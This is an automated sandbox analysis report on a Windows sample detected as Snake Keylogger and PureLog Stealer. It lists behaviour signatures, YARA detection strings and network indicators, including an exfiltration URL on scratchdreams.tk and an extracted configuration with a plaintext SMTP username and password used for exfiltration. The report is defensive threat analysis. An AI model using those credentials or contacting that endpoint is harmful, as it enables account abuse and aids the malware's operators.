Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DEKONT.exe

Overview

General Information

Sample name:DEKONT.exe
Analysis ID:1430860
MD5:384c4da2b75f4c7a1fa5585bc07634e6
SHA1:27d368536af080b92d543f9c24af8596cc0edd6d
SHA256:8980e6e2628b4103f4e3e0b01365a5e9a7df6e38c067c93633371c94b3d5dd34
Tags:exe
Infos:

Detection

PureLog Stealer, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DEKONT.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\DEKONT.exe" MD5: 384C4DA2B75F4C7A1FA5585BC07634E6)
    • DEKONT.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\DEKONT.exe" MD5: 384C4DA2B75F4C7A1FA5585BC07634E6)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "s.reyhani@agmfilter.com", "Password": "sibelr_63017", "Host": "mail.agmfilter.com", "Port": "587"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1378528073.0000000005B20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x147ab:$a1: get_encryptedPassword
        • 0x14aa1:$a2: get_encryptedUsername
        • 0x145b7:$a3: get_timePasswordChanged
        • 0x146b2:$a4: get_passwordField
        • 0x147c1:$a5: set_encryptedPassword
        • 0x15da8:$a7: get_logins
        • 0x15d0b:$a10: KeyLoggerEventArgs
        • 0x159a4:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x18184:$x1: $%SMTPDV$
        • 0x181e8:$x2: $#TheHashHere%&
        • 0x1983b:$x3: %FTPDV$
        • 0x1992f:$x4: $%TelegramDv$
        • 0x159a4:$x5: KeyLoggerEventArgs
        • 0x15d0b:$x5: KeyLoggerEventArgs
        • 0x1985f:$m2: Clipboard Logs ID
        • 0x19a2b:$m2: Screenshot Logs ID
        • 0x19af7:$m2: keystroke Logs ID
        • 0x19a03:$m4: \SnakeKeylogger\
        Click to see the 15 entries
        SourceRuleDescriptionAuthorStrings
        0.2.DEKONT.exe.4409970.10.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.DEKONT.exe.5b20000.11.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.DEKONT.exe.4409970.10.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.DEKONT.exe.5b20000.11.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                3.2.DEKONT.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 32 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: DEKONT.exeAvira: detected
                  Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
                  Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
                  Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
                  Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "s.reyhani@agmfilter.com", "Password": "sibelr_63017", "Host": "mail.agmfilter.com", "Port": "587"}
                  Source: scratchdreams.tkVirustotal: Detection: 17%Perma Link
                  Source: https://scratchdreams.tkVirustotal: Detection: 16%Perma Link
                  Source: http://scratchdreams.tkVirustotal: Detection: 17%Perma Link
                  Source: https://scratchdreams.tk/_send_.php?TSVirustotal: Detection: 14%Perma Link
                  Source: DEKONT.exeReversingLabs: Detection: 44%
                  Source: DEKONT.exeVirustotal: Detection: 47%Perma Link
                  Source: DEKONT.exeJoe Sandbox ML: detected
                  Source: DEKONT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49709 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.8:49725 version: TLS 1.2
                  Source: DEKONT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: YaaO.pdbSHA256 source: DEKONT.exe
                  Source: Binary string: YaaO.pdb source: DEKONT.exe
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_05972E10
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_05972E08
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_05972880
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_07AB1C08
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then push dword ptr [ebp-24h]0_2_07AB24A0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_07AB24A0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then push dword ptr [ebp-24h]0_2_07AB2495
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_07AB2495
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 07ABFA6Ah0_2_07ABF1EC
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then xor edx, edx0_2_07AB1FC5
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then xor edx, edx0_2_07AB1FD0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then push dword ptr [ebp-20h]0_2_07AB1D6C
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_07AB1D6C
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then push dword ptr [ebp-20h]0_2_07AB1D78
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_07AB1D78
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_07AB1BFD
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 02DCF7A1h3_2_02DCF4E8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_02DCEA08
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 02DCFBF9h3_2_02DCF941
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2DDC1h3_2_05B2DB18
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B22658h3_2_05B22586
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B22091h3_2_05B21DE0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B217D1h3_2_05B21520
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2F7D1h3_2_05B2F528
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2C809h3_2_05B2C560
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2EF21h3_2_05B2EC78
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B20F11h3_2_05B20C60
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2E219h3_2_05B2DF70
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2D969h3_2_05B2D6C0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2D0B9h3_2_05B2CE10
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2CC61h3_2_05B2C9B8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B21C31h3_2_05B21980
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2FC29h3_2_05B2F980
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2C3B1h3_2_05B2C108
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2F379h3_2_05B2F0D0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B21371h3_2_05B210C0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2EAC9h3_2_05B2E820
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2021Dh3_2_05B20040
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B20BA7h3_2_05B20040
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2E671h3_2_05B2E3C8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B2D511h3_2_05B2D268
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 05B22658h3_2_05B22240
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE8D95h3_2_06CE8A58
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE72C9h3_2_06CE7020
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE6169h3_2_06CE5EC0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE5D11h3_2_06CE5A68
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE88A9h3_2_06CE8600
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE6E71h3_2_06CE6BC8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_06CE37FB
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE6A19h3_2_06CE6770
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE65C1h3_2_06CE6318
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE7BA1h3_2_06CE78F8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE0B99h3_2_06CE08F0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE0741h3_2_06CE0498
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE774Ah3_2_06CE74A0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE02E9h3_2_06CE0040
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_06CE3808
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE5891h3_2_06CE55E8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE8451h3_2_06CE81A8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE1449h3_2_06CE11A0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE0FF1h3_2_06CE0D48
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 4x nop then jmp 06CE7FF9h3_2_06CE7D50

                  Networking

                  barindex
                  Source: Yara matchFile source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewIP Address: 104.21.27.85 104.21.27.85
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49709 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
                  Source: DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003163000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000308D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: DEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: DEKONT.exe, 00000003.00000002.3822157482.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: DEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: DEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
                  Source: DEKONT.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/154.16.105.36
                  Source: DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/154.16.105.36$
                  Source: DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/154.16.105.36(
                  Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
                  Source: DEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.8:49725 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
